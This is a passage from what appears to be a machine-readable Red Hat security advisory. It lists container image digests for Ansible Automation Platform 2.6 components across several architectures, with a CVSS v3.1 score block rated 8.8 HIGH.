"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:b0d2c4a8c1f06afe52ab0b1eff3ab2e782481982edb708f3996b6ae380523ccc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:cdff41f6d52d8d2190178ad267f67054dacd9f77afff99f25b16fb24a8031236_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:09bdd457cf53397c33a08cfa248c9a88a53677650e8403c7cf8fb71a8c8fe1ce_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:780cf2fc697936935144ea82dbe6e8a420a100574cb5da06c6083181a89a3fd7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:9301963c347cc3f67a7ff06658a938a0d2abcd810fffb1b468ac467b6bf07531_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:b6a9267895ec71a6920e44fe43a595a7861476ac7ff0ad44c79841e02070323d_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:8469d45c44fb42b40596a37088a406b89a199a5298ce9c9c527b2448757aca76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:960ff4c01e0051b1de0f9985d5e92c35ce21c13545aecadf9c412c5895f2c77a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cc9bda507e8846425484938651d5a1a3fff17e8573434dfcec8a261fb68d7f11_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cf18d22b6a2b25a236b960ab4f474cad8439dfd48b3da1d7f5cfdb49457c6717_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:08f6497b7039fdf75880aa6e6b76ed85101d6767a5123e0762edaf1d66aa619d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3398c37307e6ba2dcc592e125f1abf194db50c2d29df2ef2647cb297ff7bfe7e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:360722ce74ffd759973fa3f15e30803f0ffb261e27d5c5546d5a485f424996ad_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3e8a9664a261f1973bf768b2392553bb11d5c9a09f0631ce1537130b7fb67e86_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:4e7f88967319f7410fb6826406bb175c1a4410a049918e6c3f7548083ac1f83e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:6dc7f5723548675e39283b90cc6345b23ec4cc3db57224c9bb5732ccd51a681c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:c7fbe8aa9424816bde8e61591968d75b9436aadc33348338a21bcb19e54f585f_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:caa6bd6fa78d5d29e620a9b89e22f07b9fbe7c9793b55ebf0cdfb969cc91dc68_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:1bbb8bdf4e4245579b74a0c8a80bf85849866a286b91f053292f48a08f65d80d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:3d0853b4f0b9fb4fac9d57a18873b3b4c9a267da5a469b3bee7a5cd32c9c4b40_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:40c9b33e0165a6acf554ebea49486ab235b26600554ae14d370a2f0476105803_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:fbad0fd8701a969937246e948928c63e644748c8e2e0ce5203032957741a2e84_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:86539e1f8ad1d2ade220ebab8e80ffdda740a3a29ac51e27f7febca1dc412bae_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:99ac77ccc235297459f77ea620429d42bb0a8dd26fd41d334cc53a396232e3a3_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:aa0bfc3af0659b2c5cddfde7f7d194b05749ba517e22e131f54ab18759f2c046_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:fcbebd780563758a09022a38fbaf6d3d4b8f90a362d40c8e48020b78b81e348b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:0942386e5c666874d6a7680724651e595847de30c23260494596ffa946eb960f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:82f9a6a71433d512d3139962ac400de9a99e5a8509dd12967bc946b8efd2b262_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a816effc6382edc76b2d1ff777c109f7c5f6de9c3d15125f66106b64b5544f37_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:dd48ee4c2bfbd685a288931bcba731b7324e33cd66b5ff57b1dbec1b0c0662b8_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:0957ac2b026c05796bd1bb066559d47fbd4fe70554acaa31a55f40863f4bf345_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:3e090bc1d88a6deb3db462ea36e9e98ab5f973d50e063d37a01fa423d4cb3c5d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c5dbef2ff58cb287a63acbadfd1bcfc12f8938f000aa7d05ac3bc9d8ccc7a062_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c948573a88c6a6c752e8c051d9753a761d773231c46940de624397b20dc5176b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:05af0b67c8222faff9e85e80a397d81d4ceb0f99f5cbc261362080dd43db7409_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1609aa26aaf411f44a388546cacbb6c3c41cd2cc129c03cdb89d2ef8570b0407_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1e7f99a462dc2643327f33fcf54539798628c869c59974475ff1eccf60f04cdb_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f0e755a03078917a3add8bed575aa2d4f19bbc1c16069485cf59a2fff5fedad6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:941b3a0d97b863362a6ff3abdde6071e9b450301a46d67dfe7c1a6172bbecd6a_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:dae29680daff4810413849c1458c08d1d2bb6a07074cbd4c1eccacd109b9374c_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6234df5349999e20be07aa3c38010a3a65be0ee046773d1bca3514e208f3cf78_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:83d86c80c569a9f31196747e15d264bfc251a6674838bb6429a287d32a787459_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:c2df702889d1107e0e3af4af521e7a4e5f95e903e86841f1aa358c8dab9c60a1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:cc7e50863e30c9d063e2a565d0c458731213d1207e350c7806f43034a858ae5b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:815e697ac53fe170190a0d0cb7b97850b0d82e5e2922d3d26cb915c657cf1580_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:8fd2d13811182cef881debf6be72511b3c1bec13419b06227992870e4f73b08e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:aacbd0924a893df085378cfe45a33b2ad7decf5d73ef92ee23c9781186736438_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:cc22ae64354f0e0339b863bd9e24f03bd94a55ae29361ddc7be944a713b66766_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:533594cf53838ba60378f8e20fab01b26bf154219fcac7086aba05efbb0f2e5f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:58aecbcbd1ed707cceb107eae0c11c048c1840fcc5be1eae9172ab9a367e5a5d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8c94a0beee5e82d7de3ab1f25b4c9d9419d04f8be965896f1ed8e12e00a1c4c9_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e777c309cb46685326bf61f6cb617e8f05b5f135fd3579f3fc403a8eef902246_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:080a2749d8f069a561915ba788999a6d9a0d4641df282cf62168e63414ca0098_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:bb921be10afe800a9670670965b9df554fc03fc32d6d6619a4d2f0e80f9c32dd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:c50352c97aeccabaa290f9a33436b59c83d0fabe9047585ed7dbd1f2e02976e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:e2e6a5db64da900bb1f004f2beabd3bd578aa43a5d69051ee774918ab8d8950e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:0dc1770990eb18e29e4b5d0d6e31f76ea98b9bc553b4af38ba2fa419b260836b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:4a00012fedf458afc04d5a2c010027d3e482d9dabcb82f55d4cb479473f9d2d6_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:703c8aa650afe52683e2d15e7f6fdfbd8fc9c4e35122fe0ef551bbc14b4675c1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:89dea5d275fba916d2d988ee6b5420ac3d0e198ec0195cdf5db818f7331eaea4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:06aa0cc29ecfe0adac0b42a4a3d8a73641d2d222e3d882af86f31b547223444d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9513550a50f14bd48a45cbd2f493e79bd9b4416efb035d62699e176906c2a70e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:d34a73ba2e35682b4090373682112b5b15a232e217a13717a5dbe30ad6e0d524_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:ee7252d8265f1530bb9ad5908f9b292d348275cdb3552306f9831eb8ad3c577f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:01b7617033de7cf8a24b35a098abd34185605ab879dba4f1bb5af5777d5060c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:5195a7de6c4496dc134aac3095981534ccb352bd542c728a5d8bc86e87d5f681_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:ac4600c8d66becc731d588b718d0e6651abcd4aedea4bfac384e52266542a129_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:be9b91c9336638bfadfd88f9da08f3f343879a7d2023dd79952be9ab6882be09_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:1299a3e187dff4f23c8170e488bf5ecddd82b1de80126f4c2c919069b011f100_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:69d9574df2c7d58e17db96bb3f1f6fbef45b8756dc311cefbb11eac1c5687623_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:7ac4a5aa9f4aedf07af022fe3592df0e4ae972796c3d228f54036d40f07cfe25_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:ea1c58c4940001e56a3ad0f5f716605c52adfbc0e36c84ed4ecfe54af9362743_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:142125ce7f176ce4d9755f3124714bbfd8e10a687378988761d5451bd135ca76_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9adedee87c7a2cbbb28ed5a3b5f17b9c7cfeb5ee4ff8df793aeb4a4f3794ac3f_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:a13732636405962dcbb3d6f6e50e9dedfaae2ff7b1a5b3c0325b2562ae5dd109_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:ade01460c7010d882979bc2b8c97c92bb6fe0c606d6dd2c131686ebf20d90b50_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:15d2b3d290e15d375ac40ec0c47f00de2a4b3e2f0dc8aa081e135a70eae72338_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:5b48bdddf275aaa65dcdc7f478baa6ee7508bb7702a2995c53a05c569afa9841_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:73b2178a84f953a63c8cbcee481b6911e193f77a7df1b17ad53a11df5409f184_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:afa286d0c0332f681e5b25160cefaaca86947efe3121bad7f9ef5c41d6e5dede_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3a2cbe7ab27580512cf973c81ebde3fa03f74e30c1820f4878bafce5f17bdb20_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:54f4749f9b9685fd9e9e87522d64f2078dde65f196b6829cbe4ad6f64005376d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6e90b9356d0b0471e01e990081f98fff57a2bb4c3d3b6558ddca32d66f5146e3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:7ebac59134bc4c91ce9230c9f44123b480a959dff54ca374699cfbfb9bfcb8a6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21485ddd8b92241b280978969d1567f1c4b9a8847dca5eb582dde5c3b83ce1c5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:4609656d13e0608036b64764997d727bd182fdd5b46f55da45983cb94bf6d56e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:a952ec77f30441e9d8567939d3ddf44a18723d411a3f0f9bacce4dc53db55721_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:da80b80f58c5b252fad5c8c8a7737a73672be5dfda3727d9dae867192a1992ca_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:10953fb6eb77149c5449f19b712dc47f9a699cff1662b1fab80b10e95e59d7eb_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:1c81563472c472228365a0b75d39020bdc526fef589d83c076c021be9bca07d4_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:67f54bafa057771cae48c96f6daf49c74606c805b7783d47765b7ae0fee06fdb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:caf6663c6815dd74306ca316f3b748982c5550c15abfae19bf083cdbdc301ec8_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:288219fd88218e8a99533937b1abda0211a1294ce0aa71dfb8d98fb4ac298864_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:62628bcd333089ef22600473ddf6b5acee70e1c2bbf5f1c2983e21665633a974_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:6c45d9dc22e02c136e8f1903430e85f1add5c3d66233ec0af560e4851a5aa0cd_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:a5eaaaf93a768fc5654a33a7612735697de4af3a7cf15533aeb3fbd6d2ef735f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3dce912c04e50532020ef82da326f495f9a191a834c393081d6b3d2a9247f986_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:4cd246efb45ed57287e2b1178e464d0ab7fe54383283890cf36651b8a964d98d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:8c0b63347f0d33f362b47d18f234b708ff793fe9ba742184b9cf8338ab708ba5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:d60af60b04d91d194a4bbef011514bb568b04afe408615f967ea354bf9d99770_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:102451cf6511b1f59847011f2294bfbb03988e05c5252f0061d5d59e2e366ab7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:4ed0fc6b0218e1bbefb20b824680570d987975e4637b4b8bf309f1043f50ac42_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:b0d2c4a8c1f06afe52ab0b1eff3ab2e782481982edb708f3996b6ae380523ccc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:cdff41f6d52d8d2190178ad267f67054dacd9f77afff99f25b16fb24a8031236_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:09bdd457cf53397c33a08cfa248c9a88a53677650e8403c7cf8fb71a8c8fe1ce_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:780cf2fc697936935144ea82dbe6e8a420a100574cb5da06c6083181a89a3fd7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:9301963c347cc3f67a7ff06658a938a0d2abcd810fffb1b468ac467b6bf07531_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:b6a9267895ec71a6920e44fe43a595a7861476ac7ff0ad44c79841e02070323d_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:8469d45c44fb42b40596a37088a406b89a199a5298ce9c9c527b2448757aca76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:960ff4c01e0051b1de0f9985d5e92c35ce21c13545aecadf9c412c5895f2c77a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cc9bda507e8846425484938651d5a1a3fff17e8573434dfcec8a261fb68d7f11_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cf18d22b6a2b25a236b960ab4f474cad8439dfd48b3da1d7f5cfdb49457c6717_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:08f6497b7039fdf75880aa6e6b76ed85101d6767a5123e0762edaf1d66aa619d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3398c37307e6ba2dcc592e125f1abf194db50c2d29df2ef2647cb297ff7bfe7e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:360722ce74ffd759973fa3f15e30803f0ffb261e27d5c5546d5a485f424996ad_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3e8a9664a261f1973bf768b2392553bb11d5c9a09f0631ce1537130b7fb67e86_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:4e7f88967319f7410fb6826406bb175c1a4410a049918e6c3f7548083ac1f83e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:6dc7f5723548675e39283b90cc6345b23ec4cc3db57224c9bb5732ccd51a681c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:c7fbe8aa9424816bde8e61591968d75b9436aadc33348338a21bcb19e54f585f_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:caa6bd6fa78d5d29e620a9b89e22f07b9fbe7c9793b55ebf0cdfb969cc91dc68_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:1bbb8bdf4e4245579b74a0c8a80bf85849866a286b91f053292f48a08f65d80d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:3d0853b4f0b9fb4fac9d57a18873b3b4c9a267da5a469b3bee7a5cd32c9c4b40_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:40c9b33e0165a6acf554ebea49486ab235b26600554ae14d370a2f0476105803_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:fbad0fd8701a969937246e948928c63e644748c8e2e0ce5203032957741a2e84_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:86539e1f8ad1d2ade220ebab8e80ffdda740a3a29ac51e27f7febca1dc412bae_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:99ac77ccc235297459f77ea620429d42bb0a8dd26fd41d334cc53a396232e3a3_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:aa0bfc3af0659b2c5cddfde7f7d194b05749ba517e22e131f54ab18759f2c046_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:fcbebd780563758a09022a38fbaf6d3d4b8f90a362d40c8e48020b78b81e348b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:0942386e5c666874d6a7680724651e595847de30c23260494596ffa946eb960f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:82f9a6a71433d512d3139962ac400de9a99e5a8509dd12967bc946b8efd2b262_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a816effc6382edc76b2d1ff777c109f7c5f6de9c3d15125f66106b64b5544f37_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:dd48ee4c2bfbd685a288931bcba731b7324e33cd66b5ff57b1dbec1b0c0662b8_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:0957ac2b026c05796bd1bb066559d47fbd4fe70554acaa31a55f40863f4bf345_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:3e090bc1d88a6deb3db462ea36e9e98ab5f973d50e063d37a01fa423d4cb3c5d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c5dbef2ff58cb287a63acbadfd1bcfc12f8938f000aa7d05ac3bc9d8ccc7a062_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c948573a88c6a6c752e8c051d9753a761d773231c46940de624397b20dc5176b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:05af0b67c8222faff9e85e80a397d81d4ceb0f99f5cbc261362080dd43db7409_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1609aa26aaf411f44a388546cacbb6c3c41cd2cc129c03cdb89d2ef8570b0407_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1e7f99a462dc2643327f33fcf54539798628c869c59974475ff1eccf60f04cdb_s390x",
